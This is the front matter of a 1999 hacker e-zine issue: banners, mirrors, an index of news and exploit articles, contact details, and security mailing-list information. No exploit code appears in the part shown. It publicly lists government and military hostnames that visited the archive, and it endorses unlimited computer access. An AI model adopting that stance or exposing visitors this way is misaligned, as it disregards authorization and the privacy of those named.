Copy Link
Add to Bookmark
Report

hwa-hn40

eZine's profile picture
Published in 
HWA
 · 26 Apr 2019

  

[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 40 Volume 1 1999 Oct 31st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

"ABUSUS NON TOLLIT USUM"

==========================================================================


Rule #1 Noone talks about fightclub!


_
))
.-'-'--.
// | \ \ \
| | | | | |
\ \| / / /
`~~~~~~'





__ __ _____ __ _
/ / / /___ _____ ____ __ __ / ___/____ _____ ___ / /_ ____ _(_)___
/ /_/ / __ `/ __ \/ __ \/ / / / \__ \/ __ `/ __ `__ \/ __ \/ __ `/ / __ \
/ __ / /_/ / /_/ / /_/ / /_/ / ___/ / /_/ / / / / / / / / / /_/ / / / / /
/_/ /_/\__,_/ .___/ .___/\__, / /____/\__,_/_/ /_/ /_/_/ /_/\__,_/_/_/ /_/
/_/ /_/ /____/


__ __ __ ____ _
_/_// / / /___ _/ / /___ _ _____ ___ ____ | |
/ / / /_/ / __ `/ / / __ \ | /| / / _ \/ _ \/ __ \ / /
/ / / __ / /_/ / / / /_/ / |/ |/ / __/ __/ / / / / /
/ / /_/ /_/\__,_/_/_/\____/|__/|__/\___/\___/_/ /_/_/_/
|_| /_/



_
))
.-'-'--.
// | \ \ \
| | | | | |
\ \| / / /
`~~~~~~'



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=






Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...

infosec.se
gate2.mcbutler.usmc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

http://welcome.to/HWA.hax0r.news/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.

Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:


Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.


I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=



New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/

* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.



HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=



SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #40

=-----------------------------------------------------------------------=



We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=--------------------------------------------------------------------------=

Issue #40
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly). This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

Quote of the week from irc.core.com's MOTD


<nEuSpEeD> Y IS MY CPS GOING DOWN>>>>
<Aikikai> nEuSpEeD: Because when you type in caps, it takes more bandwidth.
s <Aikikai> nEuSpEeD: Therefore, your cps drops
<nEuSpEeD> OH
<nEuSpEeD> ok



01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Two states tangle with 'cyber terrorist'.........................
04.0 .. Tempest Information Made Available ..............................
05.0 .. Virus That Hit Marines Identified ...............................
06.0 .. Love sick hacker hits Microsoft hard.............................
07.0 .. Russian ATMs Compromised ........................................
08.0 .. Kentucky Emergency Sirens Activated - Hacker Blamed .............
09.0 .. Over 24 Variants of Melissa Found With More to Come .............
10.0 .. Online Threats Labeled Cyberterrorism ...........................
11.0 .. QPOP 2.41beta1 exploit (linux x86) by mastoras...................
12.0 .. ls0f.c Vulnerable: linux machines running lsof 4.40..............
13.0 .. Free phone calls over the internet in the US.....................
14.0 .. Are You a Cyberspace Addict? s...................................
15.0 .. Congressman Lobbies IETF For Privacy ............................
16.0 .. The King Of Hidden Directories by Zym0t1c........................
17.0 .. The Hidden Directories text referred to in 16.0 (kM/mr Disco)....
18.0 .. Cable + Wireless Security Compromised ...........................
19.0 .. Yugo Cyber War Not As Widespread As First Thought................
20.0 .. England To Launch High Tech Crime Unit ..........................
21.0 .. First Project Macro Virus Discovered ............................
22.0 .. Microsoft Web Page Defaced ......................................
23.0 .. Rubi-Con Wants You! .............................................
24.0 .. Clinton Signs Phone-Tracking Bill Under 911 Cover ...............
25.0 .. Carry Tax on Dollars Proposed ...................................
26.0 .. $250 Million in Police Tech Approved ............................
27.0 .. Interview With Web Inventor .....................................
28.0 .. Computer Attacks Up Sharply in Hong Kong ........................
29.0 .. AOL Password Scams Abound .......................................
30.0 .. United Loan Gunmen Return .......................................
31.0 .. Flipz' exploit...................................................
32.0 .. Fuqrag interview.................................................
33.0 .. Privacy and Encryption Labeled Antisocial By DOJ ................
34.0 .. B02K Reviewed By WinNT Magazine .................................
35.0 .. MP3 Pirates Beware ..............................................
36.0 .. Red Herring Reviews Defcon ......................................
37.0 .. Hong Kong to Create Government Gateway ..........................
38.0 .. .mil and .gov Defacements on the Increase .......................
39.0 .. CNet Chooses Top Ten 'Hacks' ....................................
40.0 .. MSNBC Special Report ............................................
41.0 .. Cops Receive Info on Internet Crime Fighting ....................
42.0 .. LSU Experiences DOS Attack ......................................
43.0 .. Oklahoma Paging System Vandalized ...............................
44.0 .. You Thought You Were Safe .......................................
45.0 .. The Weather Channel and Four More .gov/.mil Sites Defaced .......
46.0 .. Nerds Will Fight Next World War .................................
47.0 .. Hole Found in Mac OS 9 ..........................................
48.0 .. Time Spreads Cable Modem FUD ....................................
49.0 .. DutchThreat Quit?................................................
50.0 .. Can you protect your image on the net?...........................
51.0 .. Do secure email sites offer foolproof safety?....................
52.0 .. Celtech ExpressFS USER Buffer Overflow Vulnerability ............
53.0 .. Netscape Messaging Server RCPT TO DoS Vulnerability..............
54.0 .. WFTPD Remote Buffer Overflow Vulnerability.......................
55.0 .. Pacific Software URL Live! Directory Traversal vulnerability.....
56.0 .. InfoSec for dummies parts I and II ..............................
57.0 .. Thwarting the systems cracker parts 1 to 6.......................
58.0 .. Crossroads: Linux networking and security........................
59.0 .. Cool phone stuff on the internet (Check out mytalk its leet!)....
60.0 .. Securing DNS in FreeBSD/OpenBSD..................................
61.0 .. Getting someone's IP thru ICQ without a hacking proggie..........
62.0 .. Intrusion detection within a secured network.....................
63.0 .. Preparing your Linux box for the internet: Armoring Linux........
64.0 .. Securing DNS (Linux version).....................................
65.0 .. Exploit for FreeBSD sperl4.036 by OVX............................
666.0 .. tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);................
67.0 .. dopewarez.c exploit for Dopewars.................................
68.0 .. Linux forged packets.............................................
69.0 .. Nashuatec printer is vulnerable to various attacks...............
70.0 .. xmonisdn bug.....................................................
71.0 .. Nasty stack smashing bug in Linux-2.2.12 execve .................
72.0 .. Finjan exploit alert.............................................
73.0 .. Hybrid network cablemodems.......................................
74.0 .. HP Printer display hack (source code)............................
75.0 .. Omni-NFS/X Enterprise version 6.1................................
76.0 .. More IE5 vulnerabilities.........................................
77.0 .. Insanity (Gov-boi from www.hack.co.za) dies in a car crash.......
78.0 .. "Secret" Nokia phone codes.......................................
79.0 .. Realnetworks snooping? ..........................................
80.0 .. Copying DVD movies?..............................................
81.0 .. Elite irc falls..................................................


=-------------------------------------------------------------------------------=


AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:


HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5



WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.


Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*


If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org



+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

http://www.ottawacitizen.com/business/

http://search.yahoo.com.sg/search/news_sg?p=hack

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

http://www.zdnet.com/zdtv/cybercrime/

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ Electronic Underground Affiliation

http://ech0.cjb.net ech0 Security

http://axon.jccc.net/hir/ Hackers Information Report

http://net-security.org Net Security

http://www.403-security.org Daily news and security related site


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="Link</a">http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)


UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.


BUGTRAQ moves to a new home
---------------------------


First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.


Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.


The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.


Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:


BUGTRAQ@SECURITYFOCUS.COM


Security Focus also be providing a free searchable vulnerability
database.


BUGTRAQ es muy bueno
--------------------


It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.


As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.


In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).


What is Security Focus?
-----------------------


Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.


On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:


* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.


The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.


To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:


SUBS INCIDENTS FirstName, LastName


Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.


On the information resource front you find a large database of
the following:


* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.


* Products. An incredible number of categorized security products
from over two hundred different vendors.


* Services. A large and focused directory of security services offered by
vendors.


* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.


* Tools. A large array of free security tools. Categorized and
available for download.


* News: A vast number of security news articles going all the way
back to 1995.


* Security Resources: A directory to other security resources on
the net.


As well as many other things such as an event calendar.


For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.


I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.


I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.


Cheers.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01





Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


--[ New ISN announcement (New!!)


Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM


It all starts long ago, on a network far away..


Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.


As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.


Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".


